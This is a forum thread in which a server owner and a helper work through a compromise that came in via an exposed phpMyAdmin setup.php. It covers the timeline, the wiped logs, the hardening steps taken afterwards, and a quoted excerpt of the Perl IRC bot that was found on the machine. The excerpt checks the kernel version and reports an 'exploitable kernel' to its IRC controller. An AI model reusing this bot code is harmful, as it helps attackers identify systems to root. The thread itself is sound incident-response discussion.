Oct 17 15:33:44 apache users crontab is REPLACE'd
Oct 17 15:34:01 crond runs 'perl /tmp/iptraf' for user apache.
Oct 17 16:21:53 load average goes up to 12, reaching 312 on Oct 18 07:29:53.

The fact SELinux was or got disabled and that /phpmyadmin's setup.php was (still there and) accessible publicly (GETs and POSTs) w/o restrictions didn't spell much good. It's (almost but not) funny that most of the time tell-tale signs are recorded in Apache error_log which something like Logwatch or any other log parser *should* report. Since the "victim" runs a XEN kernel did you run other guests you should inspect as well?


[quote]
falcon1620 wrote:
Most everything else was either missing, wiped or didn't seem to interesting in terms of loggs on this machine here, [/quote]
What was missing?
How did you determine things were wiped?
Could you list all files with apache ownership and modification time between Oct 15 and 18?
Do you still have *all* the temporary files that got dumped on the system?

falcon1620
Posts: 22
Joined: 2009/06/29 19:23:16

Re: I've been rooted

Post by falcon1620 » 2010/11/02 16:31:28

Well its been pretty crazy over here, I am wrapping up a project here this month, So sorry for my long delay... What I have done to secure the other systems is in the very least remove the PHPMYAdmin setup file. Something that I had not even really bothered to look for. I assumed that PHP didn't have such a folder, as often I would configure the authentication manually, and connect it to the MySQL server locally and use it to just get stuff done quickly. Didn't even notice the Setup folder, kind of threw it on there and used it. As that was the latest that would run under the PHP version 2.1.0 on CentOS with out recompiling PHP (Defeting the purpose of using CentOS's). I have changes access to PHPMYadmin to local users only, and placed it onto a VPN for better security. Also I have ensured that .htaccess on that folder is set up more robustly and in some cases removed PHPMyAdmin entirely from my web folder, only to install it when needed (if at all). Now that I know about it I will be removing it from my machines even on PHP that is dealt with via a package manager.

[quote]The fact SELinux was or got disabled and that /phpmyadmin's setup.php was (still there and) accessible publicly (GETs and POSTs) w/o restrictions didn't spell much good. It's (almost but not) funny that most of the time tell-tale signs are recorded in Apache error_log which something like Logwatch or any other log parser *should* report. Since the "victim" runs a XEN kernel did you run other guests you should inspect as well? [/quote]

Yes I agree, in fact I had monitored and run that system for 5 years! and just kept it up to date since then. It was pretty much the Celeron Poweregde SC440 from when they had a sale on it for $200 for the box. It was my personal box, used for SSH SFTP, and webmail. I did review the log watch files, which occasionally reported to me SSH access attempts a few times before I switched ports and used Key authentication for it later on (Once I actually learned how to do all that). There was no really suspicious activity outside the norm until the exploit. Almost as if they had found it through a script and took advantage of the exploit right away. One second the box was pretty normal, when I got up and used the internal mail client it was slower and I knew that it had just gotten hacked over night. Particularly interesting is the Perl code I posted earlier which had that Kernel version listed as an "exploitable" kernel. Listed here
[code]
...
sub rooting {

my $printl=$_[0];
my $kern=`uname -a`;
if ($kern =~ /2.4.17\s/ || $kern =~ /2.4.18\s/ || $kern =~ /2.4.19\s/ || $kern =~ /2.4.20/ ||
$kern =~ /2.4.20-8/ || $kern =~ /2.4.21\s/ ||
$kern =~ /2.4.22\s/ || $kern =~ /2.4.22-10\s/ || $kern =~ /2.4.23\s/ || $kern =~ /2.4.24\s/ ||
$kern =~ /2.4.25-1\s/ || $kern =~ /2.4.26\s/ ||
$kern =~ /2.4.27\s/ || $kern =~ /2.6.2\s/ || $kern =~ /2.6.5\s/ || $kern =~ /2.6.6\s/ ||
$kern =~ /2.6.7\s/ || $kern =~ /2.6.8\s/ || $kern =~ /2.6.8-5\s/ ||
$kern =~ /2.6.9\s/ || $kern =~ /2.6.9-34\s/ || $kern =~ /2.6.10\s/ || $kern =~ /2.6.11/ ||
$kern =~ /2.6.13\s/ || $kern =~ /2.6.13-17/ || $kern =~ /2.6.14\s/ ||
$kern =~ /2.6.15\s/ || $kern =~ /2.6.16\s/)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Exploitable Kernel !!]\002 I m an exploitable Kernel: ".`uname -r`);
}
else
{
return 1;
}
...
[/code]

The max time lapsed between checking logs was about 1 week, so it was the tail end of that weeks time frame. Fact of the matter is that yes it is true that I didn't remove the phpmyadmin setup. In fact I didn't really pay that much attention to it, as typically use PHPMYAdmin with out much issue. I have sense gotten over using SQL through PHPMYAdmin entirely and can now create and use MySQL command line interface which is actually easier in my opinion since most things are only connecting to the MySQL socket locally any way. So There is less of a need. I guess that on this machine some on removed my .htaccess file with restricted the PHPMYadmin and in fact my friend did say that he had removed it the week prior to the attack because he needed it for a project. Well I do find it amusing or interesting, but only because its a personal box, not one that I am using say for business daily. Anyhow I can say that in fact Logwatch has tough me a lot about Linux administration (Coming from the Windows Security background, and being a Mac user as a kid (Pre OS-X era), aside from my DOS 2.11 days) and has actually allowed me to make some changes to services like mail, SSH and web before people caused any harm. Usually you could pick up on intrusion attempts and then go fix configuration issues that didn't typically lend itself to vulnerability like in this case, where setup was accessed and exploited. Now prior to the attack SELinux was Enforcing, and I confirmed that with another user on the system. Up until the attack as far as I can tell SELinux was set to Enforcing.

I didn't have any XEN guests running at the time, and in fact there were no XEN images on the system either. Those were wiped clean. I built a few XEN guests on that server box and moved them over, but they are all running fine and are clean of any malware. I use the XEN Kernel occasionally to mess with XEN or build XEN images.

What was missing?
Just about any other log files were missing, that was really about it. Some low level system logs like dmsg dumps and stuff were left on, but almost all service logs and log archives were wiped. Including logs that I had actually previously went though myself and g-zipped them up to copy or move them. There was about 5 years worth of logs on all services on there that were typically backed up. All of them were wiped clean. No logs indicated an intrusion attempt during that time. Which says that the intruder attempted to wipe the logs after initially gaining access to the system in a hap hazardous fasion. One more day and I would have noticed that most of the logs were wiped clean. I assume that he would have wiped the logs that I had gotten as well if I had allowed the server to continue running, but I forced a rather brute and sudden shut down. During the span of that week, who knows what was on there. I would suspect that you would see more of the same, attacks against PHPMyAdmin in the http error log. Once they got in it was instantaneousness. Additionally log watch files are forwarded to my mail account which is typically checked just about every day on that particular machine so that I can read them. :-)

How did you determine things were wiped?
Just the logs were wiped, and there was also a folder with an escaped space, or similar as an attempt to hide the obvious-ness of it. But the folder didn't contain anything. Maybe the folder was use temporarily to execute some code and clean up shop some before installing the Bot Script. It appears that the intruder was also particular about how the bot script would run, and once had access to the machine wasn't concerned about getting back in through the exploit, because his cron scrip would go nab the bot again and execute it. Although I did go through the systems /etc/cron.d files, there must have been another instance of Cron running because I did not see any cron jobs that were malicious. I also ran a diff on the con configuration files against a good machine from another location (Internal use only) with similar services running, and they didn't find anything that was outside of system admin changes, so I am not sure quite what to make of this, maybe cron was being run else ware? Entirely possible but If they did I didn't easily find it.

Could you list all files with apache ownership and modification time between Oct 15 and 18?
Now for "apache" file ownership I noticed that there were two apache users, one with a lower case "apache" and one with an Uppercase "Apache". Unless there were other strange escaped folders on the system, I didn't see anything. There were no other user account created, and no nasty files in any user accounts folders. There were only 5 account on that machine total and about 2 which had direct access to sudo or root.

Do you still have *all* the temporary files that got dumped on the system?
I think so, I will try to get them from my image for you... But I noticed only 2 items the empty folder with an escaped space as the folder name, which was totally empty and the bot script. All other files were files that were owned by the system and things that I expected to see with about the same file sizes in there for that machine. I would have noticed changes, since I used the TMP folder to dump some shell script output too during my shell scripting class, so...

Post Reply